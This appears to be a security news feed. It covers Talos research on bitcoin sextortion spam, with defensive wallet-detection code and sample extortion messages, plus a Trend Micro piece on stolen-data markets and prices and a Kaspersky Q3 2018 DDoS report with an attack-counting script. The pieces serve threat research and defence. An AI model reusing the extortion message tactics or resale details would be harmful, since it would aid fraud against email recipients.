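            for w in BTC_CANDIDATE.findall(m["body"]):
                wallets[w] += 1
    return {
        "campaign_messages": len(campaign),
        "unique_recipients": len(per_recipient),
        "max_per_recipient": max(per_recipient.values(), default=0),
        "wallet_candidates": wallets,
        "valid_wallets": {w for w in wallets if is_valid_btc_address(w)},
    }


# Constructed sample messages (hypothetical senders, recipients and bodies).
SAMPLE_MESSAGES = [
    {"from": "Aaron123Smith@yahoo.jp", "to": "victim1@example.com",
     "body": "I know your password. Send $3000 in bitcoin to "
             "1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy within 48 hours."},
    {"from": "Aaron@Smith456.edu", "to": "victim1@example.com",
     "body": "Last warning. Bitcoin wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa. "
             "You have 24 hours."},
    {"from": "Aaron@Smith789.edu", "to": "victim2@example.com",
     "body": "Pay $5000 in bitcoin to 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 "
             "or the video goes out."},
    # Genesis address with its last character changed: looks right, fails checksum.
    {"from": "support@example.org", "to": "victim3@example.com",
     "body": "Your invoice: BTC address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb (bitcoin)."},
    {"from": "newsletter@example.net", "to": "victim3@example.com",
     "body": "Weekly digest. Nothing to see here."},
]

if __name__ == "__main__":
    result = analyze(SAMPLE_MESSAGES)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The regex is deliberately loose, as in the post, so that it catches the wallet strings attackers paste into varied templates; the checksum then discards look-alikes before any wallet is treated as an indicator or queried against a blockchain explorer. Per-recipient counts come only from messages whose From: header matches the campaign, mirroring how the post computed its "messages per recipient" figure.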

Attackers' use of personal information

One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.

An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.

An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion

Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam and the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.

An example of a sextortion message in Spanish

Additional attack variations

There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."

An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.

An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.

An example of an illicit relationship extortion message

Other (unrelated?) attack variations

As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.

A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording of the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.

An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering

There were some bitcoin-related spam campaigns we noticed that, while they had very little connecting them to the spam sent via the Necurs botnet, they represented creative attempts to coerce some victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may quickly realize this is a scam, some users who are less familiar with the concept of bitcoin may be susceptible to this type of spam.

An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"

An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.

Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many recipients may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)

Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Information security: How Hackers Leverage Stolen Data for Profit

Data theft is inarguably big business for hackers. This has been proven time and time again when big-name companies and their customers are involved in a data breach. As these instances appear to take place more often, and the number of stolen or compromised files continues to rise, it’s worth looking into exactly what hackers do with this information after they’ve put so much effort into stealing it.

While some data breaches involve low-hanging fruit – including default passwords and other sub-standard data protection measures – other attacks include increasingly sophisticated cybercriminal activity, backed by in-depth social engineering and research into potential targets. Thanks to these efforts, more than 2.6 billion records were stolen or compromised in 2017, a staggering 88 percent rise from the amount of data hackers made off with in 2016, according to Information Age.

But what takes place after a successful breach and data exfiltration? With all of this information in hand, where do hackers turn next to generate a profit?

Type of data dictates price, post-theft malicious activity

As Trend Micro research shows, the process that stolen data goes through after the initial breach depends largely upon the type of data and from what industry it was stolen.

Personally identifiable information (PII) can include a whole host of different elements and is stored by many brands to support customer accounts and personalization. Researchers discovered that once hackers bring this information to underground markets, it can be used to support identity fraud, the creation of counterfeit accounts, illicit money transfers, the launch of spam and phishing attacks, and even blackmail, extortion or hacktivism.

Let’s take a look at the ways in which other types of stolen data can be used once hackers gather it and bring it to underground marketplaces:

  • Financial data, including information tied to banking, billing and insurance activities, can be used for identity fraud, including fake tax returns and loan applications, to establish counterfeit payment cards, billing accounts or money transfers, and for blackmail or extortion. With the right details, hackers can even withdraw money directly from victims’ bank accounts.
  • Health care details, spanning hospital records, medical or insurance information and even data from medical wearables and other devices, can be sold or used to support fraudulent insurance claims, or for the fraudulent purchase of prescription drugs.
  • Payment card information, such as the card owner’s name, card number and expiration date can be used for fraudulent online purchases. As Trend Micro experts noted, when data of this kind is stolen and sold within underground hacker marketplaces, it can be even more dangerous to an individual’s identity than stolen financial data. The potential for negative impacts can be much greater with fraudulently used payment card information, particularly when that data is tied to a user’s credit card.
  • Account credentials, including the usernames and passwords, can be leveraged by hackers for fraudulent insurance claims, to buy prescriptions, to launch spam or phishing attacks, as well as for extortion or hacktivism, depending upon the account that is hacked.
  • Education information, encompassing items like student transcripts, other school records and enrollment data, can be used for identity fraud and fake student loan applications, as well as for blackmail or extortion.

One theft leads to another

A main motivation of hackers is to make off with as much stolen information as possible. This thought process is applied not only to data breaches of specific companies, but also of the data belonging to individual users as well.

“More than 2.6 billion records were stolen or compromised in 2017.”

Take stolen account credentials, for example. A hacker will often leverage a stolen username and password to support further malicious activity and data theft in the hopes of compromising even more personal information.

“Theft of user credentials might even be more dangerous than PII, as it essentially exposes the victim’s online accounts to potential malicious use,” Trend Micro researchers pointed out. “Email is often used to verify credentials and store information from other accounts, and a compromised email account can lead to further instances of fraud and identity theft.”

In such instances, a hacker can utilize stolen account credentials to fraudulently access an individual’s email. This may provide the cybercriminal with an email that includes a credit card invoice, giving them even more information for theft, and even the potential to steal, use or sell the victim’s credit card details for further fraud.

What’s more, as Trend Micro researchers noted, certain types of data are often interrelated, and the theft of one set of data often means the compromise of another, connected set. With health care files, for instance, a health care provider may store not only a patient’s medical history, but also their payment information as well. In this way, a breach of the provider could result not only in the exposure of medical details, but patient financial information as well.

What is data worth on underground marketplaces?

As Trend Micro’s interactive infographic shows, there are several different underground marketplaces existing all over the world, and the amount of profit hackers are able to generate depends on where they sell stolen information and the type of details their haul includes.

Experian data from 2018 shows how profits for certain types of data can quickly add up for hackers, including for assets like:

  • Online payment account credentials, worth up to $200
  • Credit or debit card information, worth up to $110
  • Diplomas, worth up to $400
  • Medical records, worth up to $1,000
  • Passports, worth up to $2,000

Hackers also engage in data bundling, where individual pieces of stolen information are linked and packaged together, and then sold in a premium bundle for a higher price. These more complete, fraudulent profiles can include an array of information, including a victim’s name, age, address, birth date, Social Security number, and other similar information.

Working to prevent data theft

As the profit totals hackers can generate from stolen data continues to rise, it’s imperative that businesses and individual users alike take the proper precautions to safeguard their sensitive information.

This includes replacing default security measures with more robust protections, including strong passwords and multi-factor authentication, where applicable. Organizations should also limit access to especially sensitive information and databases to only those authorized users that need to utilize this data.

User education can also be a considerable advantage in preventing information theft. Users who are aware of current threats and know not to click on suspicious links or open emails from unknown senders represent an additional layer of security against unauthorized access and cybercriminal activity.

To find out more about how to improve data prevention efforts within your organization, connect with the experts at Trend Micro today.

10 Cyber Security Travel Tips to Protect Your Devices & Data

Cyber Security Travel Tips for Business & Leisure

The holiday season is fast approaching, but hackers don’t take vacations. Whether you’re planning to go home for the holidays or travel for business on a regular basis, make sure to protect yourself from cyber crime with these cyber security travel tips. Cyber Security Travel Tip #1:…

DDoS Attacks in Q3 2018

News Overview

The third quarter 2018 turned out relatively quiet in terms of DDoS attacks. “Relatively” because there were not very many high-level multi-day DDoS onslaughts on major resources. However, the capacities employed by cybercriminals keep growing year after year, while the total number of attacks shows no signs of decline.

The early July attack on Blizzard Entertainment made some of this summer’s top headlines. Servers were sent offline, preventing players from logging in and launching their games for almost three days. Responsibility was claimed by a group called PoodleCorp, which appeared on Twitter promising to leave the company alone if its message were retweeted 2,000 times or more. Soon after that condition was satisfied, Blizzard reported “having fixed the technical issues earlier experienced by players.”

Towards the end of July there followed a series of attacks on another game publisher – Ubisoft. As a result, players were having trouble logging on to their accounts and using the multiplayer mode. According to the company spokesmen, user data was not compromised. There were no reports as to the purpose of the action. The attackers might have had financial gains in mind or just protested against some of the recent updates made to the games.

One more attack deserving the epithet of ‘major’ was, for several days, plaguing the three largest poker websites in the English-speaking segment: America’s Card… Room, PokerStars and Partypoker. The victimized operators were forced to cancel some of their events, sparking resentment on the part of players, who thus lost major sums of money.

As always, there were also DDoS attacks almost certainly resulting from political tension. The six-minute long disruption of the Swedish Social Democratic Party’s website at the end of August has been a stark example of such an attack. Likewise, politics is believed to have driven a similar attack on the website of a Democratic congressional candidate in California, which followed a month later. The tag of ‘political’ is also likely deserved by the activism-inspired (or rather environmental) motives which had fuelled the attack on the German RWE: by hitting their website the activists were trying to draw public attention to the impending clearing of the Hambach forest.

One way or another, the general public is still at a loss as to what had caused the affliction of the Ministry of Labor of the Republic of South Africa (the attack on its web resource took place in early September and, according to the Ministry spokesman, no internal systems or data were compromised). There is equal uncertainty as to the motives behind the attacks on the governmental service DigiD in Netherlands: at the end of July it was attacked thrice within one week, leaving many citizens unable to access its taxation-related and other features. Again, no data leaks were reported.

There are not many updates to the DDoS attackers’ toolset; although some curious new techniques and a couple of fresh vulnerabilities did get within sight of the experts. Thus, on July 20, they detected a mass “recruiting campaign” targeting D-Link routers, which used over 3,000 IPs and just one command server. The exploit was not very successful in corporate environments; yet it is still to be seen whether it was able to create a new botnet of user routers (and how big at that).

Speaking of “ready” or almost ready Trojans, reports began to circulate at the end of July about the newly devised Trojan Death, which builds its botnet by recruiting surveillance cameras. The handiwork of the notorious hacker Elit1Lands, this malware uses the AVTech vulnerability, made public back in October 2016. Security researcher Ankit Anubhav has managed to contact the cybercriminal and learn that so far the botnet has not been used for mass DDoS attacks; yet the author has great expectations about it, especially as Death turned out equally suitable for spam mailouts and spying.

In addition, in late August and early September, the security specialists first saw the new versions of Mirai and Gafgyt botnets exploiting the vulnerabilities in SonicWall and Apache Struts (in the last case, the same bug associated with the massive data breach at the credit reference bureau Equifax).

Meanwhile, the three authors of the original version of Mirai, who had made it publicly available, finally received their court sentence. An Alaskan federal court ordered Paras Jha, Josiah White and Dalton Norman to pay considerable restitution and serve 2,500 hours of community service. By all appearances, they will work on behalf of the FBI, and the mildness of the sentence was due to the fact that during the process the three had duly collaborated with the federal investigators: according to court documents, the three men have already accumulated more than 1,000 hours of community service by lending their expertise to at least a dozen investigations.

In addition, the British police arrested one of the intruders behind the DDoS attack on ProtonMail, mentioned in our last report. The 19-year-old rookie hacker turned out to be a British citizen, also involved in making hoax bomb threats to schools, colleges and airlines. His parents insist that he was “groomed” by “serious people” online through playing the game Minecraft. This story will hardly end with the young prodigy’s employment, although he does face possible extradition to the US: according to the investigation, his exposure was mainly due to the fact that he did not practice very good operational security.

Compared to Q3 of last year, the number of DDoS attacks slightly increased due to September, while in the summer and throughout the year, there was a noticeable drop in the number of DDoS attacks.

Quarterly number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% is the number of attacks in 2017)

The graph above shows that the slight increase from last year is owed to September, which accounts for the lion’s share of all attacks (about 5 times more compared to 2017). July and August, quite the opposite, turned out quieter versus last year. In 2017, no such disproportion was observed.

DDoS attacks defeated by Kaspersky DDoS Protection in September in proportion to Q3 total in 2017 and 2018

DDoS upsurge exactly in September is a fairly common thing: the primary target, year after year, is the education system, attacks being directed at the web resources of schools, universities and testing centers. The attack on one of England’s leading schools – Edinburgh University, which began on September 12 and lasted for nearly 24 hours, made the biggest headlines this year.

The onsets of this sort are often blamed on enemies of state, but these allegations are unfounded, according to statistics. Thus, in the course of our private investigations we discovered that attacks mostly occur during term time and subside during vacations. The British non-profit organization Jisc got almost the same result: by collecting statistics about attacks on universities it learned that there were fewer attacks when students were on vacation. The same is true for daily out-of-class hours: the main DDoS disturbances are experienced by schools during the period from 9:00 AM to 4:00 PM.

This, of course, may suggest that the perpetrators simply synchronize their actions with the daily pulse of the universities… But the simpler the explanation, the more likely it is: in all probability these attacks, too, are devised by the young ones, who may have quite a few “good” reasons to annoy their teachers, other students, or schools in general. Consistent with this assumption, our experts were able to find traces of DDoS attack preparations in the social networks; while our colleagues from Great Britain have come across a rather amusing case of their own: an attack targeting dorm servers was launched by a student in an attempt to defeat his online game adversary.

In all appearance, these cyclical outbursts will recur in the future – either until all educational institutions have secured themselves with impenetrable defenses, or until all students and their teachers have developed a whole new awareness of DDoS attacks and their consequences. It should be mentioned, however, that while most attacks are being organized by students, it does not mean that there aren’t any “serious” ones.

For example, the DDoS campaign launched in September against the American vendor Infinite Campus, which provides the parent portal service for many school districts, was so powerful and protracted that it drew the attention of the US Department of Homeland Security. It can hardly be explained by schoolchildren’s efforts alone.

Anyway, while the reasons behind the September upturn are most likely connected with the start of the new school year, the downturn is a bit harder to explain. Our experts believe that most botnet owners have reconfigured their capacities toward a more profitable and relatively safer source of revenue: cryptocurrency mining.

DDoS attacks have become a lot cheaper of late, but only for the customers. As for the organizers, their costs still run high. At the very least, one has to purchase processing power (sometimes even to equip a data center), write a Trojan of one’s own or modify an existing one (such as the ever-popular Mirai), use the Trojan to assemble a botnet, find a customer, launch the attack, and so on. Not to mention that all of this is illegal, and law enforcement is keeping up: the takedown of followed by a chain of arrests is a case in point.

Cryptocurrency mining, on the other hand, is almost legal these days: the only illegal aspect is the use of someone else’s hardware. With the right settings, mining is light enough on the host system that its owner never notices, so there is not much chance of having to deal with the cyberpolice. A cybercriminal can also repurpose hardware they already own for mining, escaping the attention of law enforcement altogether. For example, there were recent reports of a new botnet of MikroTik routers built from the outset as a cryptocurrency mining tool. There is also indirect evidence that the owners of many botnets with deservedly unsavory reputations have now reconfigured them for mining. Thus, the DDoS activity of the successful botnet yoyo has dropped very low, although there is no information about it having been dismantled.

There is a maxim in logic: correlation does not imply causation. In other words, if two variables change in a similar way, the changes do not necessarily have anything to do with each other. So while it appears logical to link the growth in cryptocurrency mining with the slack in DDoS attacks this year, this cannot claim to be the ultimate truth; it is a working assumption.



Kaspersky Lab has a long history of combatting cyberthreats, including DDoS attacks of various types and complexities. The company’s experts monitor botnets using Kaspersky DDoS Intelligence system.

As part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes the commands the bots receive from their command-and-control (C&C) servers. To initiate protection it is not necessary to wait until a user device gets infected or until the attackers’ commands get executed.

This report contains DDoS Intelligence statistics for Q3 2018.

For the purposes of this report, a single DDoS attack is one during which the intervals between the botnet’s busy periods do not exceed 24 hours. For example, if the same resource is attacked by the same botnet again after a pause of 24 hours or more, two attacks are recorded. Attacks are also counted as separate if the same resource is queried by bots belonging to different botnets.

The geographic locations of DDoS victims and command servers are determined from their IP addresses. The number of unique DDoS targets in the quarterly statistics is the number of unique targeted IP addresses.

DDoS Intelligence statistics are limited to the botnets detected and analyzed by Kaspersky Lab to date. It should also be remembered that botnets are but one of the tools used for DDoS attacks, so this section does not cover every DDoS attack in the period.
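
The counting rule above (one attack per target and botnet, split by a pause of 24 hours or more, different botnets counted separately, unique targets counted by IP) is easy to get subtly wrong when reproducing such statistics from your own C&C telemetry. The following is an added example of my own, not Kaspersky’s code; the (time, target IP, botnet) records are constructed, and the choice to treat a pause of exactly 24 hours as a split is my reading of the rule.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Pause at or beyond which the same botnet hitting the same target counts
# as a new attack (the report's "24 hours or more" rule, my reading).
SPLIT_GAP = timedelta(hours=24)

# Constructed sample of bot-command observations: (UTC time, target IP, botnet id).
# Made-up records, not DDoS Intelligence data.
SAMPLE = [
    ("2018-09-12T08:00", "203.0.113.10", "botA"),
    ("2018-09-12T20:00", "203.0.113.10", "botA"),  # 12h later: same attack
    ("2018-09-13T19:00", "203.0.113.10", "botA"),  # 23h later: still the same attack
    ("2018-09-15T10:00", "203.0.113.10", "botA"),  # 39h later: a new attack
    ("2018-09-12T09:00", "203.0.113.10", "botB"),  # other botnet, same target: separate attack
    ("2018-09-12T09:30", "198.51.100.7", "botA"),  # other target
]


def split_attacks(events, gap=SPLIT_GAP):
    """Group (time, target, botnet) observations into attacks.

    Observations for one (target, botnet) pair stay in one attack while each
    pause between consecutive observations is shorter than `gap`; a pause of
    `gap` or longer starts a new attack. Two botnets hitting the same target
    are always two attacks. Returns attacks sorted by start time.
    """
    by_pair = defaultdict(list)
    for t, target, botnet in events:
        by_pair[(target, botnet)].append(datetime.fromisoformat(t))

    attacks = []
    for (target, botnet), times in by_pair.items():
        times.sort()
        start = prev = times[0]
        for t in times[1:]:
            if t - prev >= gap:
                attacks.append(_attack(target, botnet, start, prev))
                start = t
            prev = t
        attacks.append(_attack(target, botnet, start, prev))
    return sorted(attacks, key=lambda a: (a["start"], a["target"], a["botnet"]))


def _attack(target, botnet, start, end):
    return {"target": target, "botnet": botnet, "start": start, "end": end,
            "hours": (end - start).total_seconds() / 3600}


def unique_targets(attacks):
    """Unique targets are counted by unique IP address, as in the report."""
    return len({a["target"] for a in attacks})


def longest_hours(attacks):
    """Duration of the longest attack, in hours (first to last observation)."""
    return max(a["hours"] for a in attacks)


if __name__ == "__main__":
    found = split_attacks(SAMPLE)
    for a in found:
        print(f'{a["target"]:14} {a["botnet"]:5} {a["start"]:%m-%d %H:%M} -> '
              f'{a["end"]:%m-%d %H:%M} ({a["hours"]:.0f}h)')
    print(len(found), "attacks on", unique_targets(found),
          "unique targets; longest", longest_hours(found), "h")
```

Note that durations are measured between the first and last observed command, so a single observation yields a zero-length attack; that is also why a short but repeated attack on the same target by two botnets inflates the attack count without adding a unique target.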

Quarter summary

  • As before, China tops the list for the highest number of attacks (78%), the US has reclaimed its second position (12.57%), Australia comes in third (2.27%) – higher than ever before. For the first time, South Korea has left the top 10 list, even though the entry threshold got much lower.
  • Similar trends are observed in distribution of unique targets: South Korea has dropped to the very bottom of the rating list; Australia has climbed to the third position.
  • In terms of numbers, botnet-driven DDoS attacks peaked in August; the quietest day was in early July.
  • The number of sustained attacks has declined; however, short ones with duration of under 4 hours grew 17.5 p.p. (to 86.94%). The number of unique targets has increased by 63%.
  • The share of Linux botnets has grown only slightly from the last quarter. In this context, the by-type distribution of DDoS attacks has not changed much: SYN flood still comes first (83.2%).
  • The list of countries hosting the greatest number of command servers has changed a great deal over the last quarter. Countries like Greece and Canada, previously way out of the top 10, are now high up in the list.

Attacks geography

The top line is still occupied by China, its share having soared from 59.03% to 77.67%. The US reclaimed its second position, even though it has grown the negligible 0.11 p.p. to 12.57%. This is where the surprises begin.

First off, South Korea has tumbled out of the top 10 for the first time since monitoring began: its share shrank from 3.21% last quarter to 0.30% for a downhill ride from fourth to eleventh position. Meanwhile Australia has climbed from sixth to third place: now it accounts for 2.27% of the total number of outgoing DDoS attacks. This suggests that the growth trend for the continent, which has emerged over the past few quarters, is still there. Hong Kong descended from second to fourth position: its share plummeted from 17.13% to 1.72%.

Other than South Korea, Malaysia, too, has left the top ten; these two were replaced by Singapore (0.44%) and Russia (0.37%) – seventh and tenth places respectively. Their shares have grown but little from Q2, yet because of China’s leap the admittance threshold became somewhat less demanding. The example of France demonstrates this very well: in Q2 France was tenth with 0.43% of the total number of DDoS attacks; this quarter its share reduced to 0.39% but the country still has made it to the eighth place.

Likewise, the combined percentage of all the countries from outside the top 10 has dropped from 3.56% to 2.83%.

DDoS attacks by country, Q2 and Q3 2018 (download)

Similar processes are taking place in the unique targets rating of countries: China’s share grew 18 p.p. to 70.58%. The first five positions for the number of targets look basically the same as those for the number of attacks, but the top 10 list is a bit different: South Korea is still there, although its share shrank a great deal (down to 0.39% from 4.76%). In addition, the rating list lost Malaysia and Vietnam, replaced by Russia (0.46%, eighth place) and Germany (0.38%, tenth place).

Unique DDoS targets by country, Q2 and Q3 2018 (download)

Dynamics of the number of DDoS attacks

The beginning and end of Q3 were not abundant in attacks, yet August and early September show a jagged graph with plenty of peaks and valleys. The biggest spikes occurred on August 7 and 20, which loosely correlates with the dates when universities collect applicants’ documents and announce admission scores. July 2 turned out to be the quietest day. The end of the quarter, although not very busy, still saw more attacks than its beginning.

Dynamics of the number of DDoS attacks in Q3 2018 (download)

The day-of-week distribution was fairly even this quarter. Saturday is now the most “dangerous” day of the week (15.58%), having overtaken Tuesday (13.70% last quarter). Tuesday ended up second to last in terms of the number of attacks, just ahead of Wednesday, currently the quietest day of the week (12.23%).

DDoS attacks by day of week, Q2 and Q3 2018 (download)

Duration and types of DDoS attacks

The longest attack in Q3 lasted 239 hours – just short of 10 days. Just to remind you, the previous quarter’s longest one was on for almost 11 days (258 hours).

The share of mass, protracted attacks considerably declined. This is true not only for the “champions”, which lasted upward of 140 hours, but also for all the other categories down to 5 hours. The most dramatic decline occurred in the 5 to 9 hours duration category: these attacks were down to 5.49% from 14.01%.

Yet short attacks of under 4 hours grew almost 17.5 p.p. to 86.94%. At the same time, the number of targets grew 63% from the last quarter.

DDoS attacks by duration, hours, Q2 and Q3 2018 (download)

The distribution by type of attack was almost the same as the previous quarter. SYN flood has kept its first position; its share grew even more to 83.2% (from 80.2% in the second quarter and 57.3% in Q1). UDP traffic came in second; it also edged upward to settle at 11.9% (last quarter the figure was 10.6%). Other types of attacks lost a few percentage points but suffered no change in terms of relative incidence: HTTP is still third, while TCP and ICMP – fourth and fifth respectively.

DDoS attacks by type, Q2 and Q3 2018 (download)

Windows and Linux botnets have split in about the same proportion as the last quarter: Windows botnets have gone up (and Linux ones down) by 1.4 p.p. This correlates pretty well with the attack type variation dynamics.

Windows vs. Linux botnets, Q3 2018 (download)

Botnet distribution geography

There was some shakeup in the top ten list of regions with the largest number of botnet command servers. The US remained first, although its share declined from 44.75% last quarter to 37.31%. Russia climbed to second place, having more than tripled its share from 2.76% to 8.96%. Greece came in third: it accounts for 8.21% of command servers, up from 0.55% and a position well outside the top ten the previous quarter.

China, with 5.22%, is only fifth, outplayed by Canada, which scored 6.72% (several times its Q2 figure).

At the same time, there was a major increase in the combined share of the countries outside the top ten: up almost 5 p.p., it now stands at 16.42%.

Botnets command servers by country, Q3 2018 (download)


No major high-profile attacks were reported over the last three months. In contrast with the summer slowdown, the September’s upsurge of attacks on schools was particularly noticeable. It has become a part of the cyclic trend Kaspersky Lab has observed for many years.

Another conspicuous development is the shrinking number of protracted attacks paired with growing number of unique targets: botnet owners may be replacing large-scale offensives with small attacks (sometimes referred to in English-speaking media as “crawling” ones), often indistinguishable from the “network noise”. We have seen preludes to such change of paradigm over the previous quarters.

The top ten lineup in terms of the number of botnet C&C servers has been abruptly reshuffled for the second quarter in a row. It may be that the attackers are trying to expand into new territories or to arrange geographic redundancy for their resources. The reasons may be both economic (electricity prices, robustness of the business when exposed to unforeseen circumstances) and legal – anti-cybercrime action.

The statistics for the last two quarters has led us to believe that certain transformation processes are currently unfolding in the DDoS community, which may seriously reconfigure this field of cybercriminal activities in the near future.

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer

Cybersecurity researchers have revealed an unpatched logic flaw in Microsoft Office 2016 and older versions that could allow an attacker to embed malicious code inside a document file, tricking users into running malware on their computers. Discovered by researchers at Cymulate, the bug abuses the 'Online Video' option in Word documents, a feature that allows users to embed an online

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of whom are intelligence officers -- with hacking into and stealing intellectual property from a pair of unnamed US and French companies between January 2010 and at least May 2015. The hackers were after a type of turbofan (portmanteau of turbine and fan), a large commercial airliner engine, either to avoid the development costs or to avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on a comparable engine. The hack affected unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

Top 10 Highest-Paying IT Security Roles

With cyber attacks continuously making the morning headlines, IT security has become a concern for all organizations. In an attempt to stay secure, companies are willing to break the piggy bank for skilled professionals, so it’s no surprise that salaries in this field are going through the roof. Here are some of the highest-paying IT security roles in the US.
Chief Information Security Officer | $180,000 – $300,000

C-suite executives are usually well-paid, and Chief Information Security Officers (CISOs) are no exception. They are extremely valuable to their organizations because they offer the best of both worlds: they are business savvy and own a wide range of technical skills.

Applications Security Engineer | $123,000 – $144,000

With businesses relying on all kinds of web and mobile apps, Applications Security Engineers earn big. While their salary sure looks appealing, the role requires a strong set of skills. They are in charge of an entire organization’s application security, which makes them responsible if any attack happens.

Information Security Analyst | $77,000 – $143,000

Information Security Analysts plan and carry out security measures to protect an organization’s computer networks and systems. However, their responsibilities are continually expanding as the number of cyber attacks increases every year.

Reverse Engineer | $72,000 – $139,000

By taking a piece of malware apart and studying it, Reverse Engineers can help develop new tools to combat the techniques used by malware developers, rather than reactively developing defenses for individual malware programs. Reverse engineering is widely used in computer hardware and software to enhance product features or fix certain bugs.

Data Security Analyst | $65,000 – $131,000

Data Security Analysts work to protect the troves of sensitive data that companies store, such as credit card details, billing information, customer data, and more. They are highly valuable to a company because they deal directly with an organization’s most sensitive assets.

IT Security Consultant | $52,000 – $120,000

It is crucial for security consultants to have an extensive range of skills. Indeed, you never know what your client will ask next. From simple penetration tests to assistance after a breach, consultants need to know everything.
One other important skill for consultants to have is communication. You need to be able to explain to execs, without jargon, what happened and/or how to fix the issue.

Penetration Tester | $47,000 – $109,000

Penetration testers, also known as pentesters, are a very important part of a security team. These highly-skilled (ethical) hackers are responsible for finding, exploiting, and providing remediation plans for all vulnerabilities a company may have. In 2018, there is no secure organization without the help of penetration testers.

Systems Administrator | $53,000 – $106,000

According to the NIST Cybersecurity Framework, System Administrators (SysAdmins) are responsible for setting up and maintaining an entire system or specific components of a system. For example, establishing and managing user accounts, overseeing or conducting backup and recovery tasks, implementing operational and technical security controls, etc.

IT Security Specialist | $46,000 – $102,000

Computer security is of utmost importance to organizations seeking to protect their assets on the world wide web. IT Security Specialists, also called Computer Security Specialists, are responsible for protecting those assets on a day-to-day basis.

While the cybersecurity landscape evolves, an increasing number of new roles and threats are born too. This growth gives way to a deeper and deeper skill gap question that companies answer by searching for all-around industry experts – at all cost.

Want to give your IT Security career a boost and become proficient in industry-standard roles? Check out our brand-new training paths.

